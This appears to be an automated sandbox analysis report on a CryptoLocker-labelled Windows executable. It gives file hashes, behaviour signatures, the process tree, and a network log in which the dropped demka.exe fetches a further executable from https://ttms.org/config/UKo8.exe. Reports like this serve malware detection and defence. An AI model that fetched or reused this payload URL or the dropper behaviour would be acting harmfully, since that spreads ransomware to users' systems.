Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    12/05/2024, 04:56 UTC

General

  • Target

    2024-05-12_d93f10acc1f50f66fdbe0765adaa431d_cryptolocker.exe

  • Size

    33KB

  • MD5

    d93f10acc1f50f66fdbe0765adaa431d

  • SHA1

    4d33c1e395c3bc431df1b3b32dec581fc0be09ac

  • SHA256

    bde07b6acf3efbc1854976b5a54401efacd8ceb2a414c7b8547859e8c87fd050

  • SHA512

    d60eaf61ca15732f3a51481f25d603dc7a705b03468d47b09ac1221f62deb010eb3ab523fc0d6e2fcf94004a59e10ea4e6544234e33e33a75fa46c04a1d5c429

  • SSDEEP

    384:bAvMaNGh4z7CG3POOvbRSLoF/F0QU5XYFnufc/zzo6cJ3v7yB:bAvJCYOOvbRPDEgXRcJG

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-05-12_d93f10acc1f50f66fdbe0765adaa431d_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-05-12_d93f10acc1f50f66fdbe0765adaa431d_cryptolocker.exe"
    PID: 1712
    • Loads dropped DLL
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Local\Temp\demka.exe
      "C:\Users\Admin\AppData\Local\Temp\demka.exe"
      PID: 1860
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of UnmapMainImage

Network

  • DNS
    ttms.org
    demka.exe
    Remote address:
    8.8.8.8:53
    Request
    ttms.org
    IN A
    Response
    ttms.org
    IN A
    35.215.114.222
  • GET
    https://ttms.org/config/UKo8.exe
    demka.exe
    Remote address:
    35.215.114.222:443
    Request
    GET /config/UKo8.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: ttms.org
    Cache-Control: no-cache
    Response
    HTTP/1.1 202 Accepted
    Server: nginx
    Date: Sun, 12 May 2024 04:56:55 GMT
    Content-Type: text/html
    Content-Length: 186
    Connection: keep-alive
    SG-Captcha: challenge
    X-Robots-Tag: noindex
    Set-Cookie: nevercache-b39818=Y;Max-Age=-1
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Cache-Control: no-store,no-cache,max-age=0
    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
    X-Proxy-Cache-Info: DT:1
  • 35.215.114.222:443
    https://ttms.org/config/UKo8.exe
    tls, http
    demka.exe
    910 B
    4.6kB
    8
    7

    HTTP Request

    GET https://ttms.org/config/UKo8.exe

    HTTP Response

    202
  • 8.8.8.8:53
    ttms.org
    dns
    demka.exe
    54 B
    70 B
    1
    1

    DNS Request

    ttms.org

    DNS Response

    35.215.114.222

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\demka.exe

    Filesize

    33KB

    MD5

    cc30815ce62fd95d9870a2c6afb930cb

    SHA1

    af85301447e711fa173360b34999fb5d653f123e

    SHA256

    10e3258c851f0311129eba7ccbbb68c6df18508bfabec119a79cc8d07b4e46da

    SHA512

    2a4e05a7488d91e5a0df8e2249dcc7692d9b9703b99fe55f44b50547cc2442ba84af1381c99f6d2dc08151d01ec40a75a061ec33c5e57a1c778b2d22eed6676a

  • memory/1712-0-0x0000000000300000-0x0000000000306000-memory.dmp

    Filesize

    24KB

  • memory/1712-8-0x0000000000300000-0x0000000000306000-memory.dmp

    Filesize

    24KB

  • memory/1712-1-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

  • memory/1860-23-0x00000000005D0000-0x00000000005D6000-memory.dmp

    Filesize

    24KB
